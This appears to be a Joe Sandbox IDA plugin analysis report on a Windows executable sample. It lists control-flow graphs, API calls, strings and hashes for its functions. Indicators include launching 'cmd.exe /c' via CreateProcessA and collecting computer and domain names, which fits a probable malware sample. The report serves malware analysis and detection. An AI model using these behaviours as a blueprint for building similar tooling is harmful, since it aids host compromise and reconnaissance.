9e12d0 call 9b4a20 6990->6998 6999 9dcbb7 call 9d0fa0 6990->6999 7016 9dcc32 6998->7016 7017 9dcbf2-9dcc30 call 9e12d0 call 9b4a20 6998->7017 6999->6998 7022 9dcc39-9dcc41 7016->7022 7017->7016 7017->7022 7026 9dcc5d-9dcc7f call 9b49c0 7022->7026 7027 9dcc43-9dcc57 call 9b49c0 7022->7027 7038 9dd02b-9dd1f1 call a58980 call 9e37b0 call 9e9130 call 9b3730 call 9e3740 call a58980 call 9c5e60 call 9f5c80 call a58980 call 9de5b0 call a58980 call 9de750 call 9e0230 call 9f2590 call 9e0230 call 9f23c0 7026->7038 7039 9dcc85-9dccc2 call 9e12d0 call 9b4a20 call 9b49c0 7026->7039 7027->7026 7114 9dd1f7-9dd200 7038->7114 7055 9dccc4-9dccd1 call 9e11a0 7039->7055 7056 9dccd6-9dccdc 7039->7056 7043->6974 7055->7056 7060 9dcce0-9dccfb call 9e12d0 call 9baed0 7056->7060 7069 9dcd0d-9dd026 call a58980 call 9e3b00 call 9e0cc0 call 9eae30 call 9e3a90 call 9e1bd0 * 2 call 9e1400 * 2 call 9e1360 call 9e1b10 call 9e1ac0 call 9e1360 call 9e1b10 call 9e1ac0 call 9e13c0 * 2 call 9e1360 call 9e16c0 call 9e16e0 call 9ea5b0 call 9e1170 call 9e11a0 call 9e13c0 * 2 call 9e1360 call 9e16c0 call 9e16e0 call 9ea5b0 call 9e11a0 call 9b7fe0 call 9e1b10 call 9e1ac0 call 9e1a60 call 9e1a90 call 9e1ac0 call 9b49c0 call 9e1ac0 call 9b49c0 call 9e1ac0 * 4 call 9bac80 7060->7069 7070 9dccfd 7060->7070 7250 9dd82e-9dd891 call a58980 call 9b76c0 call 9f1ba0 call 9e1260 call 9e0e90 7069->7250 7072 9dccff-9dcd02 7070->7072 7073 9dcd04-9dcd0b Sleep 7070->7073 7072->7069 7072->7073 7073->7060 7114->7114 7116 9dd202-9dd26e call 9b7e30 call 9e1b10 call 9e1ac0 call 9e1360 * 2 7114->7116 7138 9dd270-9dd279 7116->7138 7138->7138 7140 9dd27b-9dd291 call 9e1a90 7138->7140 7146 9dd297-9dd2a0 7140->7146 7146->7146 7148 9dd2a2-9dd2c1 call 9c3f00 7146->7148 7155 9dd2c6-9dd2cf 7148->7155 7155->7155 7157 9dd2d1-9dd30a call 9e95d0 call 9e1b10 call 9e1ac0 7155->7157 7170 9dd310-9dd319 7157->7170 7170->7170 7172 9dd31b-9dd825 call 9e1c10 call 9b7e30 call 9e1b10 call 9e1ac0 call a58980 call 9e37b0 call 9e8f40 call 9e9580 call 9e9470 call 9b3730 call 9e1ac0 * 2 call 9e3740 call 9e10a0 call 9e10c0 call 9ea4d0 call a58980 call 9e37b0 call 9e9490 call 9e9470 call 9e1ac0 call 9e9490 call 9e9470 call 9e1ac0 call 9e3740 call 9e1c10 call 9c4670 call 9e9b40 call 9e9c10 call 9e9ad0 call 9b49c0 * 2 call a58980 call 9e3b00 call 9b3730 call 9e3a90 call 9e12d0 call 9d1c90 call 9bac80 call 9b49c0 call 9e1ac0 * 2 call 9bb040 call 9e1ac0 call 9bb040 call 9e1ac0 * 5 call 9b7d70 call 9c6020 * 2 7170->7172 7172->7250 7394 9dd829 call 9bb040 7172->7394 7273 9dd8a3-9ddba9 call 9e9de0 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e11d0 call 9b49c0 * 10 call 9e1bd0 call 9e1660 call a65282 call 9e1bd0 call 9e1660 call a65282 call 9e9de0 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e11d0 call 9b49c0 * 8 call 9e90a0 7250->7273 7274 9dd893-9dd89e call 9e1170 7250->7274 7426 9ddbaf-9ddbc0 call 9bf5e0 7273->7426 7427 9ddd17-9ddd28 call 9e90a0 7273->7427 7274->7273 7394->7250 7434 9de4a4-9de580 call 9b8780 call 9e1ac0 * 3 call 9b49c0 call 9b78d0 call 9b49c0 * 2 call 9e1ac0 * 8 call 9b49c0 * 3 call 9e1ac0 7426->7434 7435 9ddbc6-9ddcb7 call 9e9b40 call 9e9c10 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e9c10 call 9b49c0 * 5 call 9e1090 * 2 call a659c6 7426->7435 7432 9ddd2e-9de0a3 call 9b5130 * 2 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9b5330 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9b5330 7427->7432 7433 9de450-9de461 call 9e90a0 7427->7433 7624 9de0a9-9de42f call 9b5130 * 2 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9b5330 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9b5330 call 9b5240 * 2 7432->7624 7625 9de434-9de44e call 9b5240 * 2 7432->7625 7446 9de491-9de49d call 9cf570 7433->7446 7447 9de463-9de478 call 9cdaf0 * 2 7433->7447 7434->6790 7538 9ddcb9-9ddd00 call 9e9c70 call 9e11d0 call 9b49c0 call 9e1090 * 2 call a659c6 7435->7538 7539 9ddd03-9ddd12 call 9b49c0 7435->7539 7446->7434 7462 9de49f 7446->7462 7447->7434 7470 9de47a-9de48f call 9cdaf0 * 2 7447->7470 7462->7434 7467 9de49f call 9cf570 7462->7467 7467->7434 7470->7434 7538->7539 7539->7434 7624->7625 7625->7434
                                          APIs
                                            • Part of subcall function 009B3740: __CxxThrowException@8.LIBVCRUNTIME ref: 009B376D
                                            • Part of subcall function 009B3740: __CxxThrowException@8.LIBVCRUNTIME ref: 009B37B2
                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 009DBB9D
                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 009DBC1E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Exception@8Ios_base_dtorThrowstd::ios_base::_
                                          • String ID: ",$ ::$ ="$", $($:: $=" $X$c:\skips.txt$w#G!
                                          • API String ID: 532691672-1913111030
                                          • Opcode ID: 7764c77761f7d72ded48bf67ed0364e99ef639de70d92f2e75165fe25e7132c3
                                          • Instruction ID: 7538d93f52d372432fa74e427ae2e499df1485c067ede128ce564536b0b9282d
                                          • Opcode Fuzzy Hash: 7764c77761f7d72ded48bf67ed0364e99ef639de70d92f2e75165fe25e7132c3
                                          • Instruction Fuzzy Hash: 2BE2F330A10249CBDB14DF78CD85BDDBBB5BF85308F20868DD444AB392DB759A85CB91
                                          Function 00A64832 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 228COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 8044 a64832-a64879 GetCurrentProcess DuplicateHandle 8045 a64882-a6489f call a758de call a7723e 8044->8045 8046 a6487b-a6487d 8044->8046 8045->8046 8054 a648a1-a648af call a64c8c 8045->8054 8047 a64a50-a64a54 8046->8047 8050 a64a56-a64a59 CloseHandle 8047->8050 8051 a64a5f-a64a67 8047->8051 8050->8051 8057 a648b1-a648b3 8054->8057 8058 a648b8-a648c2 call a64acb 8054->8058 8059 a64a42-a64a47 8057->8059 8064 a648c4-a648c9 8058->8064 8065 a648cb-a648d0 8058->8065 8059->8047 8061 a64a49-a64a4f call a61daa 8059->8061 8061->8047 8067 a648d3-a648f9 call a58980 8064->8067 8065->8067 8070 a64903-a64910 8067->8070 8071 a648fb-a64901 8067->8071 8072 a64912 8070->8072 8073 a64915-a64920 8070->8073 8071->8072 8072->8073 8074 a64923-a64928 8073->8074 8074->8074 8075 a6492a-a64931 8074->8075 8076 a64934-a64939 8075->8076 8076->8076 8077 a6493b-a64940 8076->8077 8078 a64943-a64948 8077->8078 8078->8078 8079 a6494a-a64964 call a74d09 8078->8079 8082 a64a25 8079->8082 8083 a6496a-a64979 call a721c2 8079->8083 8084 a64a27-a64a39 call a74d66 * 2 8082->8084 8088 a6497f-a64990 call a76be9 8083->8088 8089 a64a68-a64a74 call a6514f 8083->8089 8084->8059 8098 a64a3b-a64a3f 8084->8098 8088->8089 8097 a64996-a649a5 call a76be9 8088->8097 8097->8089 8101 a649ab-a649b9 call a64b09 8097->8101 8098->8059 8101->8082 8104 a649bb-a649f7 CreateProcessA 8101->8104 8105 a64a00-a64a18 CloseHandle 8104->8105 8106 a649f9-a649fe 8104->8106 8107 a64a1a-a64a23 call a74d66 8105->8107 8106->8107 8107->8084
                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 00A6483D
                                          • DuplicateHandle.KERNELBASE(00000000,?,00000000,000000FF,00000000,00000001,00000002), ref: 00A64871
                                          • CloseHandle.KERNEL32(000000FF), ref: 00A64A59
                                            • Part of subcall function 00A6514F: IsProcessorFeaturePresent.KERNEL32(00000017,00A65121,?,?,009B1F07,?,?,00000016,?,?,00A6512E,00000000,00000000,00000000,00000000,00000000), ref: 00A65151
                                            • Part of subcall function 00A6514F: GetCurrentProcess.KERNEL32(C0000417,?,?,?), ref: 00A65173
                                            • Part of subcall function 00A6514F: TerminateProcess.KERNEL32(00000000), ref: 00A6517A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Process$CurrentHandle$CloseDuplicateFeaturePresentProcessorTerminate
                                          • String ID: /c $D$cmd.exe
                                          • API String ID: 1167604731-1597775715
                                          • Opcode ID: da3cc63f17920118d24c2b820336c42d387366b536cc2b8b3f947eb32bb2bf8c
                                          • Instruction ID: 39b8eb44cd27e464888ebb05dda0ca0cb950b71f95c5e6476582a7bf4eca09ff
                                          • Opcode Fuzzy Hash: da3cc63f17920118d24c2b820336c42d387366b536cc2b8b3f947eb32bb2bf8c
                                          • Instruction Fuzzy Hash: 1E71E272A00209BFDF20DFB4DC41AAEBBB9EF59354F244129F915A7251E7319E05CB60
                                          Function 00A78AA3 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300COMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 8110 a78aa3-a78ab3 8111 a78ab5-a78ac8 call a659a0 call a659b3 8110->8111 8112 a78acd-a78acf 8110->8112 8129 a78e4f 8111->8129 8114 a78e37-a78e44 call a659a0 call a659b3 8112->8114 8115 a78ad5-a78adb 8112->8115 8134 a78e4a call a65122 8114->8134 8115->8114 8118 a78ae1-a78b0c 8115->8118 8118->8114 8119 a78b12-a78b1b 8118->8119 8122 a78b35-a78b37 8119->8122 8123 a78b1d-a78b30 call a659a0 call a659b3 8119->8123 8127 a78e33-a78e35 8122->8127 8128 a78b3d-a78b41 8122->8128 8123->8134 8131 a78e52-a78e57 8127->8131 8128->8127 8133 a78b47-a78b4b 8128->8133 8129->8131 8133->8123 8137 a78b4d-a78b64 8133->8137 8134->8129 8139 a78b66-a78b69 8137->8139 8140 a78b81-a78b8a 8137->8140 8141 a78b73-a78b7c 8139->8141 8142 a78b6b-a78b71 8139->8142 8143 a78b8c-a78ba3 call a659a0 call a659b3 call a65122 8140->8143 8144 a78ba8-a78bb2 8140->8144 8147 a78c1d-a78c37 8141->8147 8142->8141 8142->8143 8173 a78d6a 8143->8173 8145 a78bb4-a78bb6 8144->8145 8146 a78bb9-a78bd7 call a75b94 call a74d66 * 2 8144->8146 8145->8146 8183 a78bf4-a78c1a call a78ff6 8146->8183 8184 a78bd9-a78bef call a659b3 call a659a0 8146->8184 8150 a78c3d-a78c4d 8147->8150 8151 a78d0b-a78d14 call a7fc47 8147->8151 8150->8151 8155 a78c53-a78c55 8150->8155 8162 a78d87 8151->8162 8163 a78d16-a78d28 8151->8163 8155->8151 8159 a78c5b-a78c81 8155->8159 8159->8151 8164 a78c87-a78c9a 8159->8164 8166 a78d8b-a78da3 ReadFile 8162->8166 8163->8162 8168 a78d2a-a78d39 GetConsoleMode 8163->8168 8164->8151 8169 a78c9c-a78c9e 8164->8169 8171 a78da5-a78dab 8166->8171 8172 a78dff-a78e0a GetLastError 8166->8172 8168->8162 8174 a78d3b-a78d3f 8168->8174 8169->8151 8175 a78ca0-a78ccb 8169->8175 8171->8172 8179 a78dad 8171->8179 8177 a78e23-a78e26 8172->8177 8178 a78e0c-a78e1e call a659b3 call a659a0 8172->8178 8181 a78d6d-a78d77 call a74d66 8173->8181 8174->8166 8180 a78d41-a78d5b ReadConsoleW 8174->8180 8175->8151 8182 a78ccd-a78ce0 8175->8182 8190 a78d63-a78d69 call a6597d 8177->8190 8191 a78e2c-a78e2e 8177->8191 8178->8173 8186 a78db0-a78dc2 8179->8186 8188 a78d5d GetLastError 8180->8188 8189 a78d7c-a78d85 8180->8189 8181->8131 8182->8151 8193 a78ce2-a78ce4 8182->8193 8183->8147 8184->8173 8186->8181 8197 a78dc4-a78dc8 8186->8197 8188->8190 8189->8186 8190->8173 8191->8181 8193->8151 8201 a78ce6-a78d06 8193->8201 8204 a78de1-a78dec 8197->8204 8205 a78dca-a78dda call a787bf 8197->8205 8201->8151 8210 a78dee call a7890f 8204->8210 8211 a78df8-a78dfd call a785ff 8204->8211 8216 a78ddd-a78ddf 8205->8216 8217 a78df3-a78df6 8210->8217 8211->8217 8216->8181 8217->8216
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3907804496
                                          • Opcode ID: 12e74b54a85a2236c5f48cfd6ce094b04a4573e9efd1c0000737dbc50dc6fdf7
                                          • Instruction ID: 91ac60694011fb5d244e73af2993214c89321c6f2e5efd0bc3ef090a8e3532c9
                                          • Opcode Fuzzy Hash: 12e74b54a85a2236c5f48cfd6ce094b04a4573e9efd1c0000737dbc50dc6fdf7
                                          • Instruction Fuzzy Hash: 30C10571E442499FDF21DFA8CD49BAEBBB0AF19310F18C195E459A7393CB388941CB61
                                          Function 00A80690 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 8218 a80690-a806c0 call a803f3 8221 a806db-a806e7 call a7cc7e 8218->8221 8222 a806c2-a806cd call a659a0 8218->8222 8227 a806e9-a806fe call a659a0 call a659b3 8221->8227 8228 a80700-a80749 call a8035e 8221->8228 8229 a806cf-a806d6 call a659b3 8222->8229 8227->8229 8237 a8074b-a80754 8228->8237 8238 a807b6-a807bf GetFileType 8228->8238 8239 a809b2-a809b8 8229->8239 8243 a8078b-a807b1 GetLastError call a6597d 8237->8243 8244 a80756-a8075a 8237->8244 8240 a80808-a8080b 8238->8240 8241 a807c1-a807f2 GetLastError call a6597d CloseHandle 8238->8241 8247 a8080d-a80812 8240->8247 8248 a80814-a8081a 8240->8248 8241->8229 8255 a807f8-a80803 call a659b3 8241->8255 8243->8229 8244->8243 8249 a8075c-a80789 call a8035e 8244->8249 8252 a8081e-a8086c call a7cbc7 8247->8252 8248->8252 8253 a8081c 8248->8253 8249->8238 8249->8243 8260 a8087c-a808a0 call a80111 8252->8260 8261 a8086e-a80870 call a8056f 8252->8261 8253->8252 8255->8229 8268 a808a2 8260->8268 8269 a808b3-a808f6 8260->8269 8265 a80875-a8087a 8261->8265 8265->8260 8267 a808a4-a808ae call a7595d 8265->8267 8267->8239 8268->8267 8271 a808f8-a808fc 8269->8271 8272 a80917-a80925 8269->8272 8271->8272 8274 a808fe-a80912 8271->8274 8275 a8092b-a8092f 8272->8275 8276 a809b0 8272->8276 8274->8272 8275->8276 8277 a80931-a80964 CloseHandle call a8035e 8275->8277 8276->8239 8280 a80998-a809ac 8277->8280 8281 a80966-a80992 GetLastError call a6597d call a7cd90 8277->8281 8280->8276 8281->8280
                                          APIs
                                            • Part of subcall function 00A8035E: CreateFileW.KERNEL32(00000000,00000000,?,00A80739,?,?,00000000,?,00A80739,00000000,0000000C), ref: 00A8037B
                                          • GetLastError.KERNEL32 ref: 00A807A4
                                          • __dosmaperr.LIBCMT ref: 00A807AB
                                          • GetFileType.KERNEL32(00000000), ref: 00A807B7
                                          • GetLastError.KERNEL32 ref: 00A807C1
                                          • __dosmaperr.LIBCMT ref: 00A807CA
                                          • CloseHandle.KERNEL32(00000000), ref: 00A807EA
                                          • CloseHandle.KERNEL32(?), ref: 00A80934
                                          • GetLastError.KERNEL32 ref: 00A80966
                                          • __dosmaperr.LIBCMT ref: 00A8096D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                          • String ID: H
                                          • API String ID: 4237864984-2852464175
                                          • Opcode ID: c3dc3a38223cc8ab1b804b26e9630d0ec2a1844c0b3225a68027d55739e6c957
                                          • Instruction ID: 32b115f46e63fa2c9c2c840aab6249b268113327186d379e4e7ecc1609dc1c37
                                          • Opcode Fuzzy Hash: c3dc3a38223cc8ab1b804b26e9630d0ec2a1844c0b3225a68027d55739e6c957
                                          • Instruction Fuzzy Hash: EEA14632A041058FDF19EFB8C852BAE7BB0EB06324F14015AF815DB3A1DB359D5ACB91
                                          Function 00A776C2 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 212COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 8286 a776c2-a776d0 8287 a776d2-a776e5 call a659b3 call a65122 8286->8287 8288 a776ea-a776ed 8286->8288 8297 a778cb-a778cf 8287->8297 8288->8287 8289 a776ef-a776f4 8288->8289 8289->8287 8292 a776f6-a776fa 8289->8292 8292->8287 8294 a776fc-a776ff 8292->8294 8294->8287 8296 a77701-a77727 call a84d80 * 2 8294->8296 8302 a7772d-a7772f 8296->8302 8303 a777b8-a777ba 8296->8303 8306 a77735-a77741 call a84d80 8302->8306 8307 a777c2-a777d6 call a84d80 8302->8307 8304 a777c0 8303->8304 8305 a777bc-a777be 8303->8305 8304->8307 8305->8304 8305->8307 8306->8307 8312 a77743-a77745 8306->8312 8313 a77802 8307->8313 8314 a777d8-a777e3 call a76e62 8307->8314 8315 a77748-a7774d 8312->8315 8317 a77805-a7780a 8313->8317 8323 a77896-a77899 8314->8323 8324 a777e9-a777f3 call a778dd 8314->8324 8315->8315 8318 a7774f-a77768 call a74d09 8315->8318 8317->8317 8320 a7780c-a77822 call a74d09 8317->8320 8331 a7776a-a77773 call a74d66 8318->8331 8332 a77778-a7778b call a721c2 8318->8332 8329 a77824-a77827 8320->8329 8330 a7782c-a7783d call a721c2 8320->8330 8327 a778c0-a778c6 call a74d66 8323->8327 8333 a777f8-a777fd 8324->8333 8344 a778c8-a778ca 8327->8344 8335 a778b9-a778bf call a74d66 8329->8335 8345 a77843-a7785d call a659b3 8330->8345 8346 a778d2-a778dc call a6514f 8330->8346 8331->8344 8348 a77791-a777a0 call a76be9 8332->8348 8349 a778d0 8332->8349 8333->8327 8335->8327 8344->8297 8356 a77860-a7787d call a721c2 call a76e62 8345->8356 8348->8349 8357 a777a6-a777b6 call a74d66 8348->8357 8349->8346 8365 a7787f-a7788d 8356->8365 8366 a7789b-a778b7 call a659b3 call a778dd 8356->8366 8357->8307 8365->8356 8367 a7788f-a77895 call a74d66 8365->8367 8366->8335 8367->8323
                                          APIs
                                          • _strrchr.LIBCMT ref: 00A77706
                                          • _strrchr.LIBCMT ref: 00A77711
                                          • _strrchr.LIBCMT ref: 00A77738
                                          • _free.LIBCMT ref: 00A7776B
                                            • Part of subcall function 00A6514F: IsProcessorFeaturePresent.KERNEL32(00000017,00A65121,?,?,009B1F07,?,?,00000016,?,?,00A6512E,00000000,00000000,00000000,00000000,00000000), ref: 00A65151
                                            • Part of subcall function 00A6514F: GetCurrentProcess.KERNEL32(C0000417,?,?,?), ref: 00A65173
                                            • Part of subcall function 00A6514F: TerminateProcess.KERNEL32(00000000), ref: 00A6517A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: _strrchr$Process$CurrentFeaturePresentProcessorTerminate_free
                                          • String ID: .com
                                          • API String ID: 1283974128-4200470757
                                          • Opcode ID: c730ec99e7b3410e95085f87dfe4ea39f652f94a34bf36e50eac62a8e5f85e5c
                                          • Instruction ID: e1ca495d431d62af0729dfd46849fc2b45c30a0f1f9db1ed304110bc886589af
                                          • Opcode Fuzzy Hash: c730ec99e7b3410e95085f87dfe4ea39f652f94a34bf36e50eac62a8e5f85e5c
                                          • Instruction Fuzzy Hash: 4E51F636A08605AFEF25AB74DD45A7E3BB8EF45360F20C169F818D7281EB318E50D761
                                          Function 009C38C0 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 399COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 9271 9c38c0-9c396d GetComputerNameExW 9272 9c3970-9c3979 9271->9272 9272->9272 9273 9c397b-9c39e8 call 9e6c20 call 9ea4d0 DsRoleGetPrimaryDomainInformation 9272->9273 9278 9c39ea-9c3a04 call 9e1800 9273->9278 9279 9c3a22-9c3a2d 9273->9279 9278->9279 9286 9c3a06-9c3a1d call 9e1800 9278->9286 9280 9c3a2f-9c3a49 call 9e1800 9279->9280 9281 9c3a70-9c3a8f 9279->9281 9290 9c3e3d-9c3e46 9280->9290 9291 9c3a4f-9c3a6b call 9e1800 9280->9291 9285 9c3a92-9c3a9b 9281->9285 9285->9285 9288 9c3a9d-9c3b87 call 9e6c20 call 9ea4d0 call 9e8f40 call 9e1940 call 9e9720 9285->9288 9286->9279 9321 9c3b89-9c3b92 9288->9321 9322 9c3c06-9c3c0f 9288->9322 9294 9c3e48-9c3e57 9290->9294 9295 9c3e77-9c3e9b 9290->9295 9291->9290 9300 9c3e6d-9c3e74 call a40c3c 9294->9300 9301 9c3e59-9c3e67 9294->9301 9297 9c3e9d-9c3eb2 9295->9297 9298 9c3ece-9c3eea call a405bb 9295->9298 9306 9c3ec4-9c3ecb call a40c3c 9297->9306 9307 9c3eb4-9c3ec2 9297->9307 9300->9295 9301->9300 9303 9c3efa-9c3eff call a65132 9301->9303 9306->9298 9307->9303 9307->9306 9323 9c3b94-9c3ba3 9321->9323 9324 9c3bc3-9c3c03 9321->9324 9325 9c3c40-9c3c68 9322->9325 9326 9c3c11-9c3c20 9322->9326 9331 9c3bb9-9c3bc0 call a40c3c 9323->9331 9332 9c3ba5-9c3bb3 9323->9332 9324->9322 9329 9c3c99-9c3cc1 9325->9329 9330 9c3c6a-9c3c79 9325->9330 9327 9c3c36-9c3c3d call a40c3c 9326->9327 9328 9c3c22-9c3c30 9326->9328 9327->9325 9328->9327 9333 9c3eeb call a65132 9328->9333 9337 9c3cf2-9c3d07 call 9b7e30 9329->9337 9338 9c3cc3-9c3cd2 9329->9338 9335 9c3c8f-9c3c96 call a40c3c 9330->9335 9336 9c3c7b-9c3c89 9330->9336 9331->9324 9332->9331 9332->9333 9350 9c3ef0 call a65132 9333->9350 9335->9329 9336->9333 9336->9335 9351 9c3d6e-9c3d77 9337->9351 9352 9c3d09-9c3d0f 9337->9352 9343 9c3ce8-9c3cef call a40c3c 9338->9343 9344 9c3cd4-9c3ce2 9338->9344 9343->9337 9344->9333 9344->9343 9355 9c3ef5 call a65132 9350->9355 9358 9c3da8-9c3db1 9351->9358 9359 9c3d79-9c3d88 9351->9359 9356 9c3d3c-9c3d6b 9352->9356 9357 9c3d11-9c3d1a 9352->9357 9355->9303 9356->9351 9363 9c3d1c-9c3d2a 9357->9363 9364 9c3d32-9c3d39 call a40c3c 9357->9364 9361 9c3de2-9c3e06 9358->9361 9362 9c3db3-9c3dc2 9358->9362 9365 9c3d9e-9c3da5 call a40c3c 9359->9365 9366 9c3d8a-9c3d98 9359->9366 9361->9290 9370 9c3e08-9c3e1d 9361->9370 9367 9c3dd8-9c3ddf call a40c3c 9362->9367 9368 9c3dc4-9c3dd2 9362->9368 9363->9350 9369 9c3d30 9363->9369 9364->9356 9365->9358 9366->9350 9366->9365 9367->9361 9368->9355 9368->9367 9369->9364 9375 9c3e1f-9c3e2d 9370->9375 9376 9c3e33-9c3e3a call a40c3c 9370->9376 9375->9355 9375->9376 9376->9290
                                          APIs
                                          • GetComputerNameExW.KERNEL32(00000000,?,?,21472377,?), ref: 009C3941
